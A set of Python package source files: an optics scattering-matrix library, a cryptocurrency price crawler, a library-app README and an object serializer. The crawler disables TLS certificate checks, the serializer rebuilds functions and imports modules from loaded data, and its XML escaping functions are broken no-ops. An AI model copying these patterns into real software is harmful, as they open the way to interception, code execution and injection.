# 10 * [lay1, lay2] + [lay1],
# [0.0] + 10*[0.5, 0.5],
# )
# stack.solve(0.1)
# x, y, z = 0.0, 0.0, np.linspace(0.0, 10.0, 1000)
# with timer:
# field = stack.calculate_fields([1.0, 0.0], [0.0, 0.0], x,y,z)
# print(timer.elapsed_time)
# with open('test_stack_1Dfield.pkl', 'wb') as pkl:
# pickle.dump(field, pkl, protocol=pickle.HIGHEST_PROTOCOL)
# layer = lay1.calculate_field([1.0, 0.0], [0.0, 0.0], x,y,z)
# #plt.contourf(np.squeeze(field['z']), np.squeeze(field['x']), np.abs(np.squeeze(field['Ex'])), levels=41)
# plt.show()
# with timer:
# Ex, Ey = stack.plot_E(1, func=np.abs, dz = 0.01)
# print(timer.elapsed_time)
# Ex = np.asarray(Ex)
# plt.show()
# plt.plot(field['z'][0,0,:], np.abs(field['Ex'][0,0,:]))
# plt.plot(z, np.abs(Ex[:, 50]))
# print(np.shape(field['z']))
# plt.show() | A-FMM | /a_fmm-0.1.0.tar.gz/a_fmm-0.1.0/A_FMM/stack.py | stack.py |
import numpy as np
import scipy.linalg as linalg
class S_matrix:
"""Implementation of the scattring matrix object
This object is a container for NxN matrices, conventionally defined as S11, S12, S21 and S22
Also, it implementens all the methods involving operations on scattring matrix
"""
def __init__(self,N):
"""Creator
Args:
N (int): Dimension of each of the NxN submatrices of the scattring matrix. The total matrix is 2Nx2N
Returns:
None.
"""
self.N=N
self.S11=np.identity(N,complex)
self.S22=np.identity(N,complex)
self.S12=np.zeros((N,N),complex)
self.S21=np.zeros((N,N),complex)
#OLD RECURSION VERSION
#def add(self,s):
# T1=np.dot(linalg.inv(np.identity(self.N,complex)-np.dot(self.S12,s.S21)),self.S11)
# T2=np.dot(linalg.inv(np.identity(self.N,complex)-np.dot(s.S21,self.S12)),s.S22)
# self.S11=np.dot(s.S11,T1)
# self.S12=s.S12+np.dot(np.dot(s.S11,self.S12),T2)
# self.S21=self.S21+np.dot(np.dot(self.S22,s.S21),T1)
# self.S22=np.dot(self.S22,T2)
#NEW RECURSION VERSION
def add(self,s):
"""Recursion method for joining two scattering matrices
The connection is between the "right" side of self and the "left" side of s
Args:
s (S_matrix): scattering matrix to be joined to self. The
Returns:
None.
"""
I=np.identity(self.N,complex)
T1=np.dot(s.S11,linalg.inv(I-np.dot(self.S12,s.S21)))
T2=np.dot(self.S22,linalg.inv(I-np.dot(s.S21,self.S12)))
self.S21=self.S21+np.dot(np.dot(T2,s.S21),self.S11)
self.S11=np.dot(T1,self.S11)
self.S12=s.S12 +np.dot(np.dot(T1,self.S12),s.S22)
self.S22=np.dot(T2,s.S22)
def add_left(self,s):
"""Recursion method for joining two scattering matrices
The connection is between the "left" side of self and the "right" side of s
Args:
s (S_matrix): scattering matrix to be joined to self. The
Returns:
None.
"""
T1=np.dot(linalg.inv(np.identity(self.N,complex)-np.dot(s.S12,self.S21)),s.S11)
T2=np.dot(linalg.inv(np.identity(self.N,complex)-np.dot(self.S12,s.S21)),self.S22)
s.S11=np.dot(self.S11,T1)
s.S12=self.S12+np.dot(np.dot(self.S11,s.S12),T2)
s.S21=s.S21+np.dot(np.dot(s.S22,self.S21),T1)
s.S22=np.dot(s.S22,T2)
def add_uniform(self,lay,d):
"""Recursion method for addig to self the progation matrix of a given layer
The connection is between the "right" side of self and the "left" side of the propagation matrix
Args:
lay (Layer): Layer of which to calculate the propagation matrix
d (float): Thickness of the layer
Returns:
None.
"""
E=np.diag(np.exp((0+2j)*np.pi*lay.k0*lay.gamma*d))
self.S11=np.dot(E,self.S11)
self.S12=np.dot(E,np.dot(self.S12,E))
self.S22=np.dot(self.S22,E)
def add_uniform_left(self,lay,d):
"""Recursion method for addig to self the progation matrix of a given layer
The connection is between the "left" side of self and the "right" side of the propagation matrix
Args:
lay (Layer): Layer of which to calculate the propagation matrix
d (float): Thickness of the layer
Returns:
None.
"""
E=np.diag(np.exp((0+2j)*np.pi*lay.k0*lay.gamma*d))
self.S11=np.dot(self.S11,E)
self.S21=np.dot(E,np.dot(self.S21,E))
self.S22=np.dot(E,self.S22)
def S_print(self,i=None,j=None):
"""Function for printing the scattering matrix.
It can print both the full matrix or the 2x2 matrix between relevant modes
Args:
i (int, optional): index of the "left" mode. Default is None (full matrix)
j (int, optional): index of the "right" mode. Default is None (full matrix)
Returns:
None.
"""
if i==None:
S=np.vstack([np.hstack([self.S11,self.S12]),np.hstack([self.S21,self.S22])])
else:
j=i if j==None else j
S=np.vstack([np.hstack([self.S11[i,j],self.S12[i,j]]),np.hstack([self.S21[i,j],self.S22[i,j]])])
print(S)
def det(self):
"""Calculate the determinat of the scattering matrix
Returns:
float: Determinant of the scattering matrix
"""
return linalg.det(np.vstack([np.hstack([self.S11,self.S12]),np.hstack([self.S21,self.S22])]))
def S_modes(self):
"""Solves the eigenvalue problem of the Bloch modes of the scattring matrix
Returns:
W (1darray): arrays of the eigenvalues (complex amplitude of the mode after one period)
V (2darray): arrays of the eigenvectors (Bloch modes on the base of the guided mode in the first and last layer)
"""
ID=np.identity(self.N)
Z=np.zeros((self.N,self.N))
S1=np.vstack([np.hstack([self.S11,Z]),np.hstack([self.S21,-ID])])
S2=np.vstack([np.hstack([ID,-self.S12]),np.hstack([Z,-self.S22])])
[W,V]=linalg.eig(S1,b=S2)
return W,V
def det_modes(self,kz,d):
ID=np.identity(self.N)
Z=np.zeros((self.N,self.N))
S1=np.vstack([np.hstack([self.S11,Z]),np.hstack([self.S21,-ID])])
S2=np.vstack([np.hstack([ID,-self.S12]),np.hstack([Z,-self.S22])])
return linalg.det(S1-np.exp((0.0+1.0j)*kz*d)*S2)
def der(self,Sm,Sp,h=0.01):
"""Calculates the first and second derivative of the scattering matrix with respec to the parameter par.
Args:
Sm (S_matrix): S matrix calculated at par=par0-h
Sp (S_matrix): S matrix calculated at par=par0+h
h (float, optional): Interval used to calculate the derivatives . Defaults to 0.01.
Returns:
tuple: tuple containing:
- S1 (2darray): First derivative of the scattering matrix with respect to par.
- S2 (2darray): Second derivative of the scattering matrix with respect to par.
"""
S=np.vstack([np.hstack([self.S11,self.S12]),np.hstack([self.S21,self.S22])])
S_m=np.vstack([np.hstack([Sm.S11,Sm.S12]),np.hstack([Sm.S21,Sm.S22])])
S_p=np.vstack([np.hstack([Sp.S11,Sp.S12]),np.hstack([Sp.S21,Sp.S22])])
S1=(S_p-S_m)/(2.0*h)
S2=(S_p+S_m-2.0*S)/(h*h)
return (S1,S2)
def matrix(self):
"""Returns the full scattering matrix
Returns:
2darray: Scattering matrix as numpy array
"""
return np.vstack([np.hstack([self.S11,self.S12]),np.hstack([self.S21,self.S22])])
def output(self,u1,d2):
"""Returs the output vectors given the input vectors
Args:
u1 (1darray): Array of modal coefficient of "left" inputs.
d2 (1darray): Array of modal coefficient of "right" inputs.
Returns:
tuple: tuple containing:
- u2 (1darray): Array of modal coefficient of "right" outputs.
- d1 (1darray): Array of modal coefficient of "left" outputs.
"""
u2=np.add(np.dot(self.S11,u1),np.dot(self.S12,d2))
d1=np.add(np.dot(self.S21,u1),np.dot(self.S22,d2))
return (u2,d1)
def left(self,u1,d1):
"""Return the "right" inout and output vectors given the "left" ones
Args:
u1 (1darray): Array of modal coefficient of "left" inputs.
d1 (1darray): Array of modal coefficient of "left" outputs.
Returns:
tuple: tuple containing:
- u2 (1darray): Array of modal coefficient of "right" outputs.
- d2 (1darray): Array of modal coefficient of "right" inputs.
"""
d2=linalg.solve(self.S22,d1-np.dot(self.S21,u1))
u2=np.add(np.dot(self.S11,u1),np.dot(self.S21,d2))
return (u2,d2)
def int_f(self,S2,u):
"""Retirn the modal coefficient between two scattering matrces (self and S2)
Args:
S2 (S_matrix): Scattering matrix to between self and the end of the structure
u (1darray): Array of modal coefficient of "left" inputs to self.
Returns:
tuple: tuple containing:
- uo (TYPE): Array of coefficients of left-propagating modes in the middle
- do (TYPE): Array of coefficients of right-propagating modes in the middle
"""
ID=np.identity(self.N)
ut=np.dot(self.S11,u)
uo=linalg.solve(ID-np.dot(self.S12,S2.S21),ut)
do=linalg.solve(ID-np.dot(S2.S21,self.S12),np.dot(S2.S21,ut))
return (uo,do)
def int_f_tot(self,S2,u,d):
"""Retirn the modal coefficient between two scattering matrces (self and S2)
Args:
S2 (S_matrix): Scattering matrix to between self and the end of the structure
u (1darray): Array of modal coefficient of "left" inputs to self.
d (1darray): Array of modal coefficient of "right" inputs to S2
Returns:
tuple: tuple containing:
- uo (TYPE): Array of coefficients of left-propagating modes in the middle
- do (TYPE): Array of coefficients of right-propagating modes in the middle
"""
ID=np.identity(self.N)
ut=np.dot(self.S11,u)
dt=np.dot(S2.S22,d)
uo=linalg.solve(ID-np.dot(self.S12,S2.S21),np.add(ut,np.dot(self.S12,dt)))
do=linalg.solve(ID-np.dot(S2.S21,self.S12),np.add(np.dot(S2.S21,ut),dt))
return (uo,do)
int_complete = int_f_tot | A-FMM | /a_fmm-0.1.0.tar.gz/a_fmm-0.1.0/A_FMM/scattering.py | scattering.py |
import argparse
import sys
from datetime import datetime
from crawl_currency import *
from update_local_id_map import *
def process_date(date):
t = datetime.strptime(date, "%Y-%m-%d")
return int(t.timestamp())
def check():
if sys.version_info.major * 10 + sys.version_info.minor < 37:
print("Minimum python interpreter version required: 3.7! Sorry!")
sys.exit(1)
def main():
check()
crawler = SimpleCrawler()
string_desc = "A simple crawler for historical data of cryptocurrencies. Be careful to input date with " \
"format Y-M-D. "
parser = argparse.ArgumentParser(description=string_desc)
group = parser.add_mutually_exclusive_group()
parser.add_argument("start", help="The start date(format Y-M-D) of the data")
parser.add_argument("end", help="The end date(format Y-M-D) of the data")
parser.add_argument("-a", '--api',
help="Private API key used for updating the local IDs map")
parser.add_argument("-l", '--limit', help="The number of currencies to crawl (1-5000). If not specified, use 50 "
"as default", default=50, type=int)
group.add_argument("-n", '--name',
help="Used to crawl single currency' data. Notice that by setting this parameter, limit will be "
"ignored.")
group.add_argument("-i", '--index', help="The start index of the data we want to process.", default=0, type=int)
group.add_argument("-f", '--file',
help="Crawl currencies with names specified in a file. Only one name is allowed per line")
parser.add_argument('-v', '-version', action='version',
version='simple_crawler version : v 1.01', help='Show the version')
args = parser.parse_args()
start = args.start
end = args.end
api_key = args.api
name = args.name
limit = args.limit
file = args.file
index = args.index
start_date = process_date(start)
end_date = process_date(end)
if file is not None:
crawler.crawl_list_currency(file, start_date, end_date)
sys.exit(0)
if name is not None:
if crawler.crawl_single_currency(name, start_date, end_date) == -1:
print(f"Sorry, can't find coin {name}")
sys.exit(1)
else:
print(f"Crawl {name} finished!")
sys.exit(0)
if api_key is not None:
if update_local_id_map(api_key) == -1:
print("Wrong API key! Check your API key and try again!")
sys.exit(1)
else:
print("Successfully update local ID map")
while limit > 400:
crawler.run_multi_query(index + limit-400, index + limit, start_date, end_date)
limit -= 400
time.sleep(30)
print("Waiting for next execution!")
crawler.run_multi_query(index, index + limit, start_date, end_date)
if __name__ == '__main__':
main() | A-Simple-Currency-Data-Crawler | /A_Simple_Currency_Data_Crawler-1.0.1-py3-none-any.whl/CurrencyDataCrawler/client.py | client.py |
import asyncio
import time
from collections import OrderedDict
import aiohttp
import pandas as pd
class SimpleCrawler:
local_map = OrderedDict()
def __init__(self):
self.read_id_map_from("map_data.txt")
@staticmethod
def process_strings(s: str):
s = s.replace("\n", "")
s = s.replace("/", "")
s.strip()
return s
async def get_page(self, cid, currency_name, time_start, time_end):
"""
Get a specified page's data
:param cid: currency id
:param currency_name: currency_name
:param time_start: the start time (seconds from unix epoch)
:param time_end: the end time (seconds from unix epoch)
:return: None
"""
with aiohttp.TCPConnector(ssl=False) as conn:
currency_name = currency_name.replace("\n", "")
url = f"https://api.coinmarketcap.com/data-api/v3/cryptocurrency/historical?id={cid}&convertId=2787&timeStart={time_start}" \
f"&timeEnd={time_end}"
print(url)
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Safari/605.1.15"
headers = {"User-Agent": user_agent}
async with aiohttp.request('GET', url, headers=headers, connector=conn) as r:
if r.status != 200:
print(f"Url: {url}")
print(f"Error response with response code {r.status}")
return -1
content = await r.json(encoding='utf-8')
data = content['data']['quotes']
self.process_data(currency_name, data)
def process_data(self, currency_name, data):
"""
Process the data crawled from web page and export as .csv file.
:param currency_name: the name of the currency
:param data: crawled data
:return: None
"""
df = pd.DataFrame()
for element in data:
quote = element['quote']
record = {"Date": element['timeOpen'][:10], "OpeningPrice": quote['open'], "HighestPrice": quote['high'],
"LowestPrice": quote['low'], "ClosingPrice": quote['close'],
"Volume": quote['volume'],
"MarketCap": quote['marketCap']}
df = df.append([record])
currency_name = SimpleCrawler.process_strings(currency_name)
df.to_csv(f'./data/{currency_name}.csv', encoding="utf-8", index=False)
print(f"Successfully export data to {currency_name}.csv!")
def look_for_id(self, currency_name):
"""
A helper method which returns the id of given currency.
:param currency_name: the name of the currency
:return: 0 for success and -1 for failure
"""
currency_name = SimpleCrawler.process_strings(currency_name)
return self.local_map.get(currency_name, -1)
def crawl_single_currency(self, currency_name, start_time, end_time):
"""
Crawl data for one currency.
:param currency_name: the name of the currency
:param start_time: the start time (seconds from unix epoch)
:param end_time: the end time (seconds from unix epoch)
:return: 0 for success and -1 for failure
"""
cid = self.look_for_id(currency_name)
if cid != -1:
loop = asyncio.get_event_loop()
tasks = asyncio.gather(
*[self.get_page(cid, currency_name, start_time, end_time)])
loop.run_until_complete(tasks)
return 0
else:
return -1
def crawl_list_currency(self, file_name, start_time, end_time):
"""
Crawl data for some currencies.
:param file_name: path of the file
:param start_time: the start time (seconds from unix epoch)
:param end_time: the end time (seconds from unix epoch)
:return: None
"""
try:
with open(file_name, "r", encoding="utf-8") as file:
name = file.readline()
groups = []
while name is not None and len(name) != 0:
name = SimpleCrawler.process_strings(name)
groups.append((name, self.local_map.get(name)))
name = file.readline()
loop = asyncio.get_event_loop()
tasks = asyncio.gather(
*[self.get_page(groups[i][1], groups[i][0], start_time, end_time) for i in range(len(groups))])
loop.run_until_complete(tasks)
print("Successfully crawl data of given currencies.")
except Exception as e:
print(e)
print("Something wrong! Check the file and code!")
def read_id_map_from(self, file_path):
"""
read IDs from local map
:param file_path:
:return: None
"""
with open(file_path, "r", encoding="utf=8") as file:
line = file.readline()
while line is not None and len(line) != 0:
data = line.split(":")
name = SimpleCrawler.process_strings(data[0])
currency_id = SimpleCrawler.process_strings(data[-1])
line = file.readline()
self.local_map[name] = int(currency_id)
def run_multi_query(self, index, limit, begin, end):
"""
Run many queries asynchronously to get multiple currencies' data
:param index: the start index
:param limit: the number of currency we want to crawl
:param begin: the start time (seconds from unix epoch)
:param end: the end time (seconds from unix epoch)
:return: None
"""
start = time.time()
loop = asyncio.get_event_loop()
currencies_names = [ele for ele in self.local_map.keys()]
ids = [self.local_map.get(i) for i in currencies_names]
tasks = asyncio.gather(
*[self.get_page(ids[i], currencies_names[i], begin, end) for i in range(index, index + limit)])
loop.run_until_complete(tasks)
end = time.time()
print(f"it takes {end - start} seconds to finish!")
if __name__ == '__main__':
crawler = SimpleCrawler()
print(crawler.look_for_id("Bitcoin\n"))
print(crawler.look_for_id("Cardano\n")) | A-Simple-Currency-Data-Crawler | /A_Simple_Currency_Data_Crawler-1.0.1-py3-none-any.whl/CurrencyDataCrawler/crawl_currency.py | crawl_currency.py |
=====
A_library
=====
An automated library software to catalogue books and efficiently displays its details.
Features
-----------
* Implemented in Django Framework and MySql database.
* Goodreads Api is used for book description, review, rating and book cover.
* Automatic fine calculation.
* A reminder mail is send when a book is due.
* Users image is displayed from IITK database.
* Admin and various staff accounts.
Install via pip
----------------------
pip install Alibrary
Install via Github
-----------------------
git clone https://github.com/R-Wolf/CFD_A_library
Requirements
^^^^^^^^^^^^
* regex
* pytz
* requests
Run
----
A code block::
python manage.py makemigrations
python manage.py migrate
python manage.py runserver
Detailed documentation is in the "docs" directory.
| A-library | /A_library-3.4.tar.gz/A_library-3.4/README.rst | README.rst |
import re
import regex
from Serializers import BaseSerializer
from Serializers import DictSerializer
from Serializers import nonetype
class XmlSerializer(BaseSerializer):
NONE_LITERAL = "null"
KEY_GROUP_NAME = "key"
VALUE_GROUP_NAME = "value"
XML_SCHEME_SOURCE = "xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" " + \
"xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\""
XML_SCHEME_PATTERN = "xmlns:xsi=\"http://www\.w3\.org/2001/XMLSchema-instance\" " + \
"xmlns:xsd=\"http://www\.w3\.org/2001/XMLSchema\""
ELEMENTARY_NAMES_PATTERN = "int|float|bool|str|NoneType|list|dict"
XML_ELEMENT_PATTERN = fr"(\<(?P<{KEY_GROUP_NAME}>{ELEMENTARY_NAMES_PATTERN})\>" + \
fr"(?P<{VALUE_GROUP_NAME}>([^<>]*)|(?R)+)\</(?:{ELEMENTARY_NAMES_PATTERN})\>)"
FIRST_XML_ELEMENT_PATTERN = fr"(\<(?P<{KEY_GROUP_NAME}>{ELEMENTARY_NAMES_PATTERN})\s*({XML_SCHEME_PATTERN})?\>" + \
fr"(?P<{VALUE_GROUP_NAME}>([^<>]*)|(?R)+)\</(?:{ELEMENTARY_NAMES_PATTERN})\>)"
def dumps(self, obj) -> str:
obj = DictSerializer.to_dict(obj)
return self.__dumps_from_dict(obj, is_first=True)
def __dumps_from_dict(self, obj, is_first=False) -> str:
if type(obj) in (int, float, bool, nonetype):
return self.__create_xml_element(type(obj).__name__, str(obj), is_first)
if type(obj) is str:
data = self.__mask_symbols(obj)
return self.__create_xml_element(str.__name__, data, is_first)
if type(obj) is list:
data = ''.join([self.__dumps_from_dict(o) for o in obj])
return self.__create_xml_element(list.__name__, data, is_first)
if type(obj) is dict:
data = ''.join(
[f"{self.__dumps_from_dict(item[0])}{self.__dumps_from_dict(item[1])}" for item in obj.items()])
return self.__create_xml_element(dict.__name__, data, is_first)
else:
raise ValueError
def loads(self, string: str):
obj = self.__loads_to_dict(string, is_first=True)
return DictSerializer.from_dict(obj)
def __loads_to_dict(self, string: str, is_first=False):
string = string.strip()
xml_element_pattern = self.FIRST_XML_ELEMENT_PATTERN if is_first else self.XML_ELEMENT_PATTERN
match = regex.fullmatch(xml_element_pattern, string)
if not match:
raise ValueError
key = match.group(self.KEY_GROUP_NAME)
value = match.group(self.VALUE_GROUP_NAME)
if key == int.__name__:
return int(value)
if key == float.__name__:
return float(value)
if key == bool.__name__:
return value == str(True)
if key == str.__name__:
return self.__unmask_symbols(value)
if key == nonetype.__name__:
return None
if key == list.__name__:
matches = regex.findall(self.XML_ELEMENT_PATTERN, value)
return [self.__loads_to_dict(match[0]) for match in matches]
if key == dict.__name__:
matches = regex.findall(self.XML_ELEMENT_PATTERN, value)
return {self.__loads_to_dict(matches[i][0]):
self.__loads_to_dict(matches[i + 1][0]) for i in range(0, len(matches), 2)}
else:
raise ValueError
def __create_xml_element(self, name: str, data: str, is_first=False):
if is_first:
return f"<{name} {self.XML_SCHEME_SOURCE}>{data}</{name}>"
else:
return f"<{name}>{data}</{name}>"
@staticmethod
def __mask_symbols(string: str) -> str:
return string.replace('&', "&").replace('<', "<").replace('>', ">"). \
replace('"', """).replace("'", "'")
@staticmethod
def __unmask_symbols(string: str) -> str:
return string.replace("&", '&').replace("<", '<').replace(">", '>'). \
replace(""", '"').replace("'", "'") | A1nzz-serializer | /A1nzz_serializer-1.0.1.tar.gz/A1nzz_serializer-1.0.1/Serializers/xml_serializer.py | xml_serializer.py |
import inspect
from Serializers import nonetype, moduletype, codetype, celltype, \
functype, bldinfunctype, \
mapproxytype, wrapdesctype, metdesctype, getsetdesctype, \
CODE_PROPS, UNIQUE_TYPES
class DictSerializer:
TYPE_KW = "type"
SOURCE_KW = "source"
CODE_KW = "__code__"
GLOBALS_KW = functype.__globals__.__name__
NAME_KW = "__name__"
DEFAULTS_KW = "__defaults__"
CLOSURE_KW = functype.__closure__.__name__
BASES_KW = "__bases__"
DICT_KW = "__dict__"
CLASS_KW = "__class__"
OBJECT_KW = "object"
@classmethod
def to_dict(cls, obj, is_inner_func=False):
if type(obj) in (int, float, bool, str, nonetype):
return obj
if type(obj) is list:
return [cls.to_dict(o) for o in obj]
if type(obj) is dict:
# Since the key in the dictionary can be a hashable object, which will be represented as a non-hashable
# dictionary, it is easier to represent the dictionary as a list of key-value pairs
return {cls.TYPE_KW: dict.__name__,
cls.SOURCE_KW: [[cls.to_dict(item[0]), cls.to_dict(item[1])] for item in obj.items()]}
if type(obj) in (set, frozenset, tuple, bytes, bytearray):
return {cls.TYPE_KW: type(obj).__name__,
cls.SOURCE_KW: cls.to_dict([*obj])}
if type(obj) is complex:
return {cls.TYPE_KW: complex.__name__,
cls.SOURCE_KW: {complex.real.__name__: obj.real,
complex.imag.__name__: obj.imag}}
if type(obj) is moduletype:
return {cls.TYPE_KW: moduletype.__name__,
cls.SOURCE_KW: obj.__name__}
if type(obj) is codetype:
code = {cls.TYPE_KW: codetype.__name__}
source = {}
for (key, value) in inspect.getmembers(obj):
if key in CODE_PROPS:
source[key] = cls.to_dict(value)
code.update({cls.SOURCE_KW: source})
return code
if type(obj) is celltype:
return {cls.TYPE_KW: celltype.__name__,
cls.SOURCE_KW: cls.to_dict(obj.cell_contents)}
if type(obj) in (staticmethod, classmethod):
return {cls.TYPE_KW: type(obj).__name__,
cls.SOURCE_KW: cls.to_dict(obj.__func__, is_inner_func)}
if inspect.isroutine(obj):
source = {}
# Code
source[cls.CODE_KW] = cls.to_dict(obj.__code__)
# Global vars
gvars = cls.__get_gvars(obj, is_inner_func)
source[cls.GLOBALS_KW] = cls.to_dict(gvars)
# Name
source[cls.NAME_KW] = cls.to_dict(obj.__name__)
# Defaults
source[cls.DEFAULTS_KW] = cls.to_dict(obj.__defaults__)
# Closure
source[cls.CLOSURE_KW] = cls.to_dict(obj.__closure__)
return {cls.TYPE_KW: functype.__name__,
cls.SOURCE_KW: source}
elif inspect.isclass(obj):
source = {}
# Name
source[cls.NAME_KW] = cls.to_dict(obj.__name__)
# Bases
source[cls.BASES_KW] = cls.to_dict(tuple(b for b in obj.__bases__ if b != object))
# Dict
source[cls.DICT_KW] = cls.__get_obj_dict(obj)
return {cls.TYPE_KW: type.__name__,
cls.SOURCE_KW: source}
else:
source = {}
# Class
source[cls.CLASS_KW] = cls.to_dict(obj.__class__)
# Dict
source[cls.DICT_KW] = cls.__get_obj_dict(obj)
return {cls.TYPE_KW: cls.OBJECT_KW,
cls.SOURCE_KW: source}
@classmethod
def __get_gvars(cls, func, is_inner_func):
name = func.__name__
gvars = {}
for gvar_name in func.__code__.co_names:
# Separating the variables that the function needs
if gvar_name in func.__globals__:
# Module
if type(func.__globals__[gvar_name]) is moduletype:
gvars[gvar_name] = func.__globals__[gvar_name]
# Class
elif inspect.isclass(func.__globals__[gvar_name]):
# To prevent recursion, the class in which this method is declared is replaced with the
# name of the class. In the future, this name will be replaced by the class type
c = func.__globals__[gvar_name]
if is_inner_func and name in c.__dict__ and func == c.__dict__[name].__func__: #!!!!
gvars[gvar_name] = c.__name__
else:
gvars[gvar_name] = c
# Recursion protection
elif gvar_name == func.__code__.co_name:
gvars[gvar_name] = func.__name__
else:
gvars[gvar_name] = func.__globals__[gvar_name]
return gvars
@classmethod
def __get_obj_dict(cls, obj):
dct = {item[0]: item[1] for item in obj.__dict__.items()}
dct2 = {}
for key, value in dct.items():
if type(value) not in UNIQUE_TYPES:
if inspect.isroutine(value):
# Recursion protection
dct2[cls.to_dict(key)] = cls.to_dict(value, is_inner_func=True)
else:
dct2[cls.to_dict(key)] = cls.to_dict(value)
return dct2
@classmethod
def from_dict(cls, obj, is_dict=False):
if is_dict:
return {cls.from_dict(item[0]): cls.from_dict(item[1]) for item in obj}
if type(obj) not in (dict, list):
return obj
elif type(obj) is list:
return [cls.from_dict(o) for o in obj]
else:
obj_type = obj[cls.TYPE_KW]
obj_source = obj[cls.SOURCE_KW]
if obj_type == dict.__name__:
return cls.from_dict(obj_source, is_dict=True)
# Key - type name, value - type itself. Calling by type name returns that type.
# This is necessary for the same creation of simple collections.
cols_dict = {t.__name__: t for t in [set, frozenset, tuple, bytes, bytearray]}
if obj_type in cols_dict:
return cols_dict[obj_type](cls.from_dict(obj_source))
if obj_type == complex.__name__:
return obj_source[complex.real.__name__] + \
obj_source[complex.imag.__name__] * 1j
if obj_type == moduletype.__name__:
return __import__(obj_source)
if obj_type == codetype.__name__:
return codetype(*[cls.from_dict(obj_source[prop]) for prop in CODE_PROPS])
if obj_type == celltype.__name__:
return celltype(cls.from_dict(obj_source))
if obj_type == staticmethod.__name__:
return staticmethod(cls.from_dict(obj_source))
if obj_type == classmethod.__name__:
return classmethod(cls.from_dict(obj_source))
if obj_type == functype.__name__:
code = cls.from_dict(obj_source[cls.CODE_KW])
gvars = cls.from_dict(obj_source[cls.GLOBALS_KW])
name = cls.from_dict(obj_source[cls.NAME_KW])
defaults = cls.from_dict(obj_source[cls.DEFAULTS_KW])
closure = cls.from_dict(obj_source[cls.CLOSURE_KW])
# If there are suitable global variables, they are replaced.
for key in gvars:
if key in code.co_name and key in globals():
gvars[key] = globals()[key]
func = functype(code, gvars, name, defaults, closure)
# Restoring recursion
if func.__name__ in gvars:
func.__globals__.update({func.__name__: func})
return func
if obj_type == type.__name__:
name = cls.from_dict(obj_source[cls.NAME_KW])
bases = cls.from_dict(obj_source[cls.BASES_KW])
dct = obj_source[cls.DICT_KW]
dct = {cls.from_dict(item[0]): cls.from_dict(item[1]) for item in dct.items()}
cl = type(name, bases, dct)
# Restore a reference to the current class in the nested method __globals__
for attr in cl.__dict__.values():
if inspect.isroutine(attr):
if type(attr) in (staticmethod, classmethod):
fglobs = attr.__func__.__globals__
else:
fglobs = attr.__globals__
for gv in fglobs.keys():
if gv == cl.__name__:
fglobs[gv] = cl
return cl
else:
clas = cls.from_dict(obj_source[cls.CLASS_KW])
dct = obj_source[cls.DICT_KW]
dct = {cls.from_dict(item[0]): cls.from_dict(item[1]) for item in dct.items()}
o = object.__new__(clas)
o.__dict__ = dct
return o | A1nzz-serializer | /A1nzz_serializer-1.0.1.tar.gz/A1nzz_serializer-1.0.1/Serializers/dict_serializer.py | dict_serializer.py |
import re
import regex
from Serializers import BaseSerializer
from Serializers import DictSerializer
from Serializers import nonetype
class JsonSerializer(BaseSerializer):
INF_LITERAL = str(1E1000)
NAN_LITERAL = str(1E1000 / 1E1000)
TRUE_LITERAL = "true"
FALSE_LITERAL = "false"
NULL_LITERAL = "null"
INT_PATTERN = fr"[+-]?\d+"
FLOAT_PATTERN = fr"(?:[+-]?\d+(?:\.\d+)?(?:e[+-]?\d+)?|[+-]?{INF_LITERAL}\b|{NAN_LITERAL}\b)"
BOOL_PATTERN = fr"({TRUE_LITERAL}|{FALSE_LITERAL})\b"
STRING_PATTERN = fr"\"(?:(?:\\\")|[^\"])*\""
NULL_PATTERN = fr"\b{NULL_LITERAL}\b"
ELEMENTARY_TYPES_PATTERN = fr"{FLOAT_PATTERN}|{INT_PATTERN}|{BOOL_PATTERN}|{STRING_PATTERN}|{NULL_PATTERN}"
# This regex use recursive statements to be able to capture nested lists and objects.
ARRAY_PATTERN = r"\[(?R)?(?:,(?R))*\]"
OBJECT_PATTERN = r"\{(?:(?R):(?R))?(?:,(?R):(?R))*\}"
VALUE_PATTERN = fr"\s*({ELEMENTARY_TYPES_PATTERN}|" + \
fr"{ARRAY_PATTERN}|{OBJECT_PATTERN})\s*"
def dumps(self, obj) -> str:
obj = DictSerializer.to_dict(obj)
return self.__dumps_from_dict(obj)
def __dumps_from_dict(self, obj) -> str:
if type(obj) in (int, float):
return str(obj)
if type(obj) is bool:
return self.TRUE_LITERAL if obj else self.FALSE_LITERAL
if type(obj) is str:
return '"' + self.__mask_quotes(obj) + '"'
if type(obj) is nonetype:
return self.NULL_LITERAL
if type(obj) is list:
return '[' + ", ".join([self.__dumps_from_dict(item) for item in obj]) + ']'
if type(obj) is dict:
return '{' + ", ".join([f"{self.__dumps_from_dict(item[0])}: "
f"{self.__dumps_from_dict(item[1])}" for item in obj.items()]) + '}'
else:
raise ValueError
def loads(self, string: str):
obj = self.__loads_to_dict(string)
return DictSerializer.from_dict(obj)
def __loads_to_dict(self, string: str):
string = string.strip()
# Int
match = re.fullmatch(self.INT_PATTERN, string)
if match:
return int(match.group(0))
# Float
match = re.fullmatch(self.FLOAT_PATTERN, string)
if match:
return float(match.group(0))
# Bool
match = re.fullmatch(self.BOOL_PATTERN, string)
if match:
return match.group(0) == self.TRUE_LITERAL
# Str
match = re.fullmatch(self.STRING_PATTERN, string)
if match:
ans = match.group(0)
ans = self.__unmask_quotes(ans)
return ans[1:-1]
# None
match = re.fullmatch(self.NULL_PATTERN, string)
if match:
return None
# List
if string[0] == '[' and string[-1] == ']':
string = string[1:-1]
matches = regex.findall(self.VALUE_PATTERN, string)
return [self.__loads_to_dict(match[0]) for match in matches]
# Dict
if string[0] == '{' and string[-1] == '}':
string = string[1:-1]
matches = regex.findall(self.VALUE_PATTERN, string)
# Variable matches will store key-value pairs in one row. Elements with
# even indexes are keys, those with odd indexes are values.
return {self.__loads_to_dict(matches[i][0]):
self.__loads_to_dict(matches[i + 1][0]) for i in range(0, len(matches), 2)}
else:
raise ValueError
@staticmethod
def __mask_quotes(string: str) -> str:
return string.replace('\\', "\\\\").replace('"', r"\"").replace("'", r"\'")
@staticmethod
def __unmask_quotes(string: str) -> str:
return string.replace('\\\\', "\\").replace(r"\"", '"').replace(r"\'", "'") | A1nzz-serializer | /A1nzz_serializer-1.0.1.tar.gz/A1nzz_serializer-1.0.1/Serializers/json_serializer.py | json_serializer.py |
# Amplicons to Global Gene (A2G<sup>2</sup>)
